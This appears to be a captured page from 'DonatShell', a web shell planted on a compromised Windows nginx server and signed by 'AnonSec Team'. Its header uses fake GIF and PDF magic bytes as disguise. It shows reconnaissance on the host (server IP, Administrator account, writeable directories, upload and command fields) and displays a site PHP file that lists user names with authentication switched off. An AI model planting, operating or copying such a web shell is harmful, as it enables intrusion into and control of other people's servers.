GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/test/userColor.php
<?
// userColor.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true; // Uncomment for after section authentication.
include('application.phpinc');
$currentPath = explode("/",$_SERVER['PHP_SELF']);
$headTitle = '_CST_ - PAGE_FILENAME';
$pageTitle = '_CST_<br>PAGE_FILENAME';
include('common/pageHeader.phpinc');
//include('Login/authenticate.phpinc'); // Uncomment for after section authentication.
$sectionTitle = "PAGE_FILENAME";
include('common/sectionHeader.phpinc');
$numcols = 2;
$numcolsprinted = 0;
$query = "
  SELECT *
    FROM user
ORDER BY userUsername
";
$sql = query_do($query);
$startBlack = true;
echo '<table width="100%" border="0" bordercolor="#000000" cellspacing="0" cellpadding="5" align="center">',"\n";
while($row = mysqli_fetch_array($sql)) {
	if ($startBlack) {
		$color = '#ffffff;';
		$backgroundcolor = "#000000;";
		$startBlack = false;
	} else {
		$color = '#000000;';
		$backgroundcolor = '#ffffff;';
		$startBlack = true;
	}
	echo ' <tr><td style="color:',$color,'background-color:',$backgroundcolor,'">',$row['userUsername'],'</td><td style="color:',$backgroundcolor,'background-color:',$color,'">',$row['userAccessTime'],'</td></tr>',"\n";
}
echo '</table>',"\n"; 
?>
<?
include('common/sectionFooter.phpinc');
include('common/pageFooter.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team